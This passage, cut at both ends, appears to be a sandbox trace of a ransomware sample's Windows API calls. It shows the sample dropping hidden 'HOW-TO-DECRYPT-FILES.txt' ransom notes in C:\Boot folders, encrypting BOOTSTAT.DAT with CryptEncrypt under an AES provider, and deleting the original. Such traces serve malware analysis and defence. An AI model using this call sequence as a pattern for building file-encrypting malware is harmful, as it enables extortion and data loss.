lpFileInformation=0x1b23144*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x55594920, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xb4a83e00, ftLastAccessTime.dwHighDateTime=0x1d35a62, ftLastWriteTime.dwLowDateTime=0xb4a83e00, ftLastWriteTime.dwHighDateTime=0x1d35a62, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0044.895] GetLastError () returned 0x12 [0044.895] SetErrorMode (uMode=0x0) returned 0x1 [0044.896] GetFullPathNameW (in: lpFileName="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e910, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x20 [0044.896] GetLastError () returned 0x12 [0044.896] SetErrorMode (uMode=0x1) returned 0x0 [0044.896] CreateFileW (lpFileName="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x390 [0044.897] GetLastError () returned 0x0 [0044.897] GetFileType (hFile=0x390) returned 0x1 [0044.897] SetErrorMode (uMode=0x0) returned 0x1 [0044.897] GetFileType (hFile=0x390) returned 0x1 [0044.897] WriteFile (in: hFile=0x390, lpBuffer=0x1b3dc94*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee70, lpOverlapped=0x0 | out: lpBuffer=0x1b3dc94*, lpNumberOfBytesWritten=0x18ee70*=0x18da, lpOverlapped=0x0) returned 1 [0044.898] GetLastError () returned 0x0 [0044.898] CloseHandle (hObject=0x390) returned 1 [0044.898] GetLastError () returned 0x0 [0044.898] GetFullPathNameW (in: lpFileName="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18ea38, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x20 [0044.898] GetLastError () returned 0x0 [0044.898] SetFileAttributesW (lpFileName="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0044.898] GetLastError () returned 0x0 [0044.898] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG", nBufferLength=0x105, lpBuffer=0x18ea64, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG", lpFilePart=0x0) returned 0xf [0044.898] GetLastError () returned 0x0 [0044.898] SetErrorMode (uMode=0x1) returned 0x0 [0044.898] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), fInfoLevelId=0x0, lpFileInformation=0x1b3f8c8 | out: lpFileInformation=0x1b3f8c8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5650d820, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x5650d820, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0xb3752ca0, ftLastWriteTime.dwHighDateTime=0x1d35a62, nFileSizeHigh=0x0, nFileSizeLow=0x6400)) returned 1 [0044.898] GetLastError () returned 0x0 [0044.898] SetErrorMode (uMode=0x0) returned 0x1 [0044.898] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG", nBufferLength=0x105, lpBuffer=0x18ea2c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG", lpFilePart=0x0) returned 0xf [0044.898] GetLastError () returned 0x0 [0044.899] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG", nBufferLength=0x105, lpBuffer=0x18e900, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG", lpFilePart=0x0) returned 0xf [0044.899] GetLastError () returned 0x0 [0044.899] SetErrorMode (uMode=0x1) returned 0x0 [0044.899] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.899] GetLastError () returned 0x20 [0044.907] SetErrorMode (uMode=0x0) returned 0x1 [0044.908] GetFullPathNameW (in: lpFileName="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e910, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x20 [0044.908] GetLastError () returned 0x20 [0044.908] SetErrorMode (uMode=0x1) returned 0x0 [0044.908] CreateFileW (lpFileName="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.908] GetLastError () returned 0x5 [0044.909] SetErrorMode (uMode=0x0) returned 0x1 [0044.910] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG1", nBufferLength=0x105, lpBuffer=0x18ea64, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG1", lpFilePart=0x0) returned 0x10 [0044.910] GetLastError () returned 0x5 [0044.910] SetErrorMode (uMode=0x1) returned 0x0 [0044.910] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), fInfoLevelId=0x0, lpFileInformation=0x1b5e670 | out: lpFileInformation=0x1b5e670*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5650d820, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x5650d820, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x5650d820, ftLastWriteTime.dwHighDateTime=0x1d2da3e, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0044.910] GetLastError () returned 0x5 [0044.910] SetErrorMode (uMode=0x0) returned 0x1 [0044.911] GetFullPathNameW (in: lpFileName="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e910, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x20 [0044.911] GetLastError () returned 0x5 [0044.911] SetErrorMode (uMode=0x1) returned 0x0 [0044.911] CreateFileW (lpFileName="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.911] GetLastError () returned 0x5 [0044.912] SetErrorMode (uMode=0x0) returned 0x1 [0044.912] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG2", nBufferLength=0x105, lpBuffer=0x18ea64, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG2", lpFilePart=0x0) returned 0x10 [0044.912] GetLastError () returned 0x5 [0044.912] SetErrorMode (uMode=0x1) returned 0x0 [0044.912] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), fInfoLevelId=0x0, lpFileInformation=0x1b7c088 | out: lpFileInformation=0x1b7c088*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5650d820, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x5650d820, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x5650d820, ftLastWriteTime.dwHighDateTime=0x1d2da3e, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0044.912] GetLastError () returned 0x5 [0044.912] SetErrorMode (uMode=0x0) returned 0x1 [0044.913] GetFullPathNameW (in: lpFileName="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e910, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x20 [0044.913] GetLastError () returned 0x5 [0044.913] SetErrorMode (uMode=0x1) returned 0x0 [0044.913] CreateFileW (lpFileName="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.913] GetLastError () returned 0x5 [0044.915] SetErrorMode (uMode=0x0) returned 0x1 [0044.915] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x18ea64, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0044.915] GetLastError () returned 0x5 [0044.915] SetErrorMode (uMode=0x1) returned 0x0 [0044.915] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), fInfoLevelId=0x0, lpFileInformation=0x1b99aa0 | out: lpFileInformation=0x1b99aa0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x553f1a00, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x553f1a00, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x553f1a00, ftLastWriteTime.dwHighDateTime=0x1d2da3e, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0044.915] GetLastError () returned 0x5 [0044.915] SetErrorMode (uMode=0x0) returned 0x1 [0044.916] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x18ea2c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0044.916] GetLastError () returned 0x5 [0044.916] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x18e900, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0044.916] GetLastError () returned 0x5 [0044.916] SetErrorMode (uMode=0x1) returned 0x0 [0044.916] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0044.916] GetLastError () returned 0x0 [0044.916] GetFileType (hFile=0x184) returned 0x1 [0044.916] SetErrorMode (uMode=0x0) returned 0x1 [0044.916] GetFileType (hFile=0x184) returned 0x1 [0044.916] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eeb4 | out: lpFileSizeHigh=0x18eeb4*=0x0) returned 0x10000 [0044.916] GetLastError () returned 0x0 [0044.916] ReadFile (in: hFile=0x184, lpBuffer=0x1b9b7e0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x18ee5c, lpOverlapped=0x0 | out: lpBuffer=0x1b9b7e0*, lpNumberOfBytesRead=0x18ee5c*=0x10000, lpOverlapped=0x0) returned 1 [0044.917] GetLastError () returned 0x0 [0044.917] CloseHandle (hObject=0x184) returned 1 [0044.918] GetLastError () returned 0x0 [0044.918] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x18ea10, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0044.918] GetLastError () returned 0x0 [0044.918] SetErrorMode (uMode=0x1) returned 0x0 [0044.918] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), fInfoLevelId=0x0, lpFileInformation=0x18eec4 | out: lpFileInformation=0x18eec4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x553f1a00, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x553f1a00, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x553f1a00, ftLastWriteTime.dwHighDateTime=0x1d2da3e, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0044.918] GetLastError () returned 0x0 [0044.918] SetErrorMode (uMode=0x0) returned 0x1 [0044.918] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x18ea30, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0044.918] GetLastError () returned 0x0 [0044.918] SetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT", dwFileAttributes=0x24) returned 1 [0044.918] GetLastError () returned 0x0 [0044.918] CryptAcquireContextW (in: phProv=0x18ee24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ee24*=0x37c4e8) returned 1 [0044.918] GetLastError () returned 0x0 [0044.948] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c15c88, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ee00 | out: phKey=0x18ee00*=0x360b20) returned 1 [0044.948] GetLastError () returned 0x0 [0044.948] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0044.948] GetLastError () returned 0x0 [0044.953] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0044.953] GetLastError () returned 0x0 [0044.953] CryptDuplicateKey (in: hKey=0x360b20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18edbc | out: phKey=0x18edbc*=0x360ae0) returned 1 [0044.953] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0044.953] GetLastError () returned 0x0 [0044.953] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1c42cd4*=0x1, dwFlags=0x0) returned 1 [0044.953] GetLastError () returned 0x0 [0044.953] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1c42ca0, dwFlags=0x0) returned 1 [0044.953] GetLastError () returned 0x0 [0044.953] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c42d1c*, pdwDataLen=0x18ee4c*=0x10100, dwBufLen=0x10100 | out: pbData=0x1c42d1c*, pdwDataLen=0x18ee4c*=0x10100) returned 1 [0044.954] GetLastError () returned 0x0 [0044.954] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c62f48*, pdwDataLen=0x18ee64*=0x10, dwBufLen=0x10 | out: pbData=0x1c62f48*, pdwDataLen=0x18ee64*=0x10) returned 1 [0044.954] GetLastError () returned 0x0 [0044.954] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c62f78*, pdwDataLen=0x18ee6c*=0x0, dwBufLen=0x10 | out: pbData=0x1c62f78*, pdwDataLen=0x18ee6c*=0x10) returned 1 [0044.954] GetLastError () returned 0x0 [0044.955] CryptDestroyKey (hKey=0x360b20) returned 1 [0044.955] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0044.955] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0044.955] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x18e908, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0044.955] GetLastError () returned 0x0 [0044.955] SetErrorMode (uMode=0x1) returned 0x0 [0044.955] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.955] GetLastError () returned 0x5 [0044.956] SetErrorMode (uMode=0x0) returned 0x1 [0044.956] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0044.956] GetLastError () returned 0x5 [0044.956] DeleteFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 1 [0044.957] GetLastError () returned 0x5 [0044.958] GetFullPathNameW (in: lpFileName="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e910, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x20 [0044.958] GetLastError () returned 0x5 [0044.958] SetErrorMode (uMode=0x1) returned 0x0 [0044.958] CreateFileW (lpFileName="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.958] GetLastError () returned 0x5 [0044.959] SetErrorMode (uMode=0x0) returned 0x1 [0044.959] GetFullPathNameW (in: lpFileName="C:\\Boot\\memtest.exe", nBufferLength=0x105, lpBuffer=0x18ea64, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\memtest.exe", lpFilePart=0x0) returned 0x13 [0044.959] GetLastError () returned 0x5 [0044.959] SetErrorMode (uMode=0x1) returned 0x0 [0044.959] GetFileAttributesExW (in: lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c90138 | out: lpFileInformation=0x1c90138*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5530d1c0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0x5c891100, ftLastWriteTime.dwHighDateTime=0x1cb887c, nFileSizeHigh=0x0, nFileSizeLow=0x76980)) returned 1 [0044.959] GetLastError () returned 0x5 [0044.960] SetErrorMode (uMode=0x0) returned 0x1 [0044.960] GetFullPathNameW (in: lpFileName="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e910, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x20 [0044.960] GetLastError () returned 0x5 [0044.960] SetErrorMode (uMode=0x1) returned 0x0 [0044.960] CreateFileW (lpFileName="C:\\Boot\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.960] GetLastError () returned 0x5 [0044.961] SetErrorMode (uMode=0x0) returned 0x1 [0044.961] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ", lpFilePart=0x0) returned 0xd [0044.961] GetLastError () returned 0x5 [0044.961] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.961] GetLastError () returned 0x5 [0044.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.961] GetLastError () returned 0x5 [0044.961] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ", lpFilePart=0x0) returned 0xd [0044.961] GetLastError () returned 0x5 [0044.961] SetErrorMode (uMode=0x1) returned 0x0 [0044.961] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0044.962] GetLastError () returned 0x5 [0044.962] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.962] GetLastError () returned 0x5 [0044.962] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.962] GetLastError () returned 0x5 [0044.962] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.962] GetLastError () returned 0x12 [0044.962] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0044.962] SetErrorMode (uMode=0x0) returned 0x1 [0044.962] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ", lpFilePart=0x0) returned 0xd [0044.962] GetLastError () returned 0x12 [0044.962] SetErrorMode (uMode=0x1) returned 0x0 [0044.962] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0044.962] GetLastError () returned 0x12 [0044.962] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.962] GetLastError () returned 0x12 [0044.962] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.962] GetLastError () returned 0x12 [0044.962] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.962] GetLastError () returned 0x12 [0044.962] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0044.963] SetErrorMode (uMode=0x0) returned 0x1 [0044.963] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0044.963] GetLastError () returned 0x12 [0044.963] SetErrorMode (uMode=0x1) returned 0x0 [0044.963] GetFileAttributesExW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1caefa8 | out: lpFileInformation=0x1caefa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55274c40, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8b85ae0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50)) returned 1 [0044.963] GetLastError () returned 0x12 [0044.963] SetErrorMode (uMode=0x0) returned 0x1 [0044.963] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0044.964] GetLastError () returned 0x12 [0044.964] SetErrorMode (uMode=0x1) returned 0x0 [0044.964] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\cs-cz\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0044.964] GetLastError () returned 0x0 [0044.964] GetFileType (hFile=0x184) returned 0x1 [0044.964] SetErrorMode (uMode=0x0) returned 0x1 [0044.964] GetFileType (hFile=0x184) returned 0x1 [0044.964] WriteFile (in: hFile=0x184, lpBuffer=0x1cca9cc*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1cca9cc*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0044.965] GetLastError () returned 0x0 [0044.965] CloseHandle (hObject=0x184) returned 1 [0044.965] GetLastError () returned 0x0 [0044.965] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0044.965] GetLastError () returned 0x0 [0044.965] SetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0044.965] GetLastError () returned 0x0 [0044.965] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK", lpFilePart=0x0) returned 0xd [0044.965] GetLastError () returned 0x0 [0044.965] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.965] GetLastError () returned 0x0 [0044.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.965] GetLastError () returned 0x0 [0044.965] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK", lpFilePart=0x0) returned 0xd [0044.965] GetLastError () returned 0x0 [0044.965] SetErrorMode (uMode=0x1) returned 0x0 [0044.966] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0044.966] GetLastError () returned 0x0 [0044.966] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.966] GetLastError () returned 0x0 [0044.966] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.966] GetLastError () returned 0x0 [0044.966] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.966] GetLastError () returned 0x12 [0044.966] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0044.966] SetErrorMode (uMode=0x0) returned 0x1 [0044.966] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK", lpFilePart=0x0) returned 0xd [0044.966] GetLastError () returned 0x12 [0044.966] SetErrorMode (uMode=0x1) returned 0x0 [0044.966] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0044.967] GetLastError () returned 0x12 [0044.967] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.967] GetLastError () returned 0x12 [0044.967] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.967] GetLastError () returned 0x12 [0044.967] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.967] GetLastError () returned 0x12 [0044.967] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0044.967] SetErrorMode (uMode=0x0) returned 0x1 [0044.967] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0044.967] GetLastError () returned 0x12 [0044.967] SetErrorMode (uMode=0x1) returned 0x0 [0044.967] GetFileAttributesExW (in: 